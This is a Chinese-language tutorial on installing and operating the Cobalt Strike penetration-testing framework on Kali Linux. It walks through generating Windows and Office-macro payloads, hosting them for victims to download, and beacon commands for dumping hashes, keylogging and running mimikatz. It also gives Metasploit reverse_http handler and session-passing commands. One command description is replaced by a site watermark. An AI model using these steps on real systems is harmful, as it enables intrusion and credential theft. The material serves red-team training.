
Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。
在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。
进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。

这样便启动了Cobalt Strike
如上会提示登录
这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令:
./teamserver 192.168.123.33 pass66
#./teamserver kali的ip 登录密码
首先配置监听
和msfconsole类似,Cobalt Strike也要配置监听。
Cobalt Strike——Listeners——Add

相关参数说明:
| 参数 | 说明 | 
|---|---|
| name | 监听任务的名称 可随意 | 
| payload | 监听的方式 支持http https TCP 等 | 
| HTTPS HOSTS | 主机IP地址 | 
| Host Rotation Strategy | 主机转移策略 一般默认即可 | 
生成shell
Attacks—Packages——windows ececutable 

配置windows平台下的shell

保存生成的shell

| 参数 | 说明 | 
|---|---|
| HTML Application | 基于http方式的攻击,如受害者打开网站即可获得shell | 
| MS Office Macro | office宏攻击,如打开word文档即可获得shell | 
| Payload Generator | 其他方式的payload,如C python vb | 
| windows ececutable | 生成windows平台下的shell | 
Shell上线
将生成的shell放到/var/www/html,并启动apache服务器
cp kali.exe /var/www/html
service apache2 start当目标主机下载并运行shell后,我们便可以看到回弹。


当我们点击interact后,便会和msfconsole一样,进入命令模式。
现列出常用的命名
| 参数 | 说明 | 
|---|---|
| argue | 匹配进程的欺骗参数 | 
| blockdlls | 阻止子进程中的非Microsoft DLL | 
| browserpivot | 设置浏览器会话 | 
| cancel | 取消正在进行的下载 | 
| cd | 改变目录位置 | 
| checkin | 呼叫总部并发布数据 | 
| chromedump | 从Google Chrome恢复凭据 | 
| clear | 清除信标队列 | 
| connect | 通过TCP连接到目标 | 
| covertV** | 部署隐蔽V**客户端 | 
| cp | 复制文件 | 
| dcsync | 从DC提取密码哈希 | 
| desktop | 查看目标桌面并与之交互 | 
| dllinject | bbskali.cn | 
| dllload | 将反射DLL注入进程 | 
| download | 文件下载 | 
| downloads | 列出正在下载的文件 | 
| drives | 列出目标上的驱动器 | 
| elevate | 在提升的上下文中生成会话 | 
| exit | 关闭当前连接 | 
| getprivs | 对当前令牌启用系统权限 | 
| getsystem | 提升系统权限 | 
| getuid | 获取用户ID | 
| hashdump | 导出hash密码 | 
| keylogger | 记录键盘 | 
| kill | Kill 掉进程 | 
| logonpasswords | 使用mimikatz转储凭据和哈希 | 
| ls | 列出文件列表 bbskali.cn | 
| make_token | 创建一个 token | 
| mimikatz | 运行神器 mimikatz | 
| mkdir | 创建一个目录 | 
| mv | 移动文件 | 
| net | 网络和主机枚举 | 
| upload | 上传文件 | 
cd /
ls
desktop
由于比较多,就不一个个说了。把常用的几个菜单说说。
Explore-File Browser

对局域网内所有设备扫描

显示目标的所有进程

首先我们在Cobalt Strike中创建一个新的Foreign Http监听

然后在msfconsole中配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.123.33
set LPORT 4444
exploit返回Cobalt Strike,选择目标,右键Spawn选择我们前面配置的Foreign Http监听

这时,我们返回到msf中便可以看到成功得到回弹。

一样,我们先建立一个http的监听

因为在msf中我们已经获得了session
在其配置如下:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.123.33
set LPORT 5555
set SESSION 1
run
set DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的 。
然后我们返回到Cobalt Strike这时便可以看到会话了

版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/1921473
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。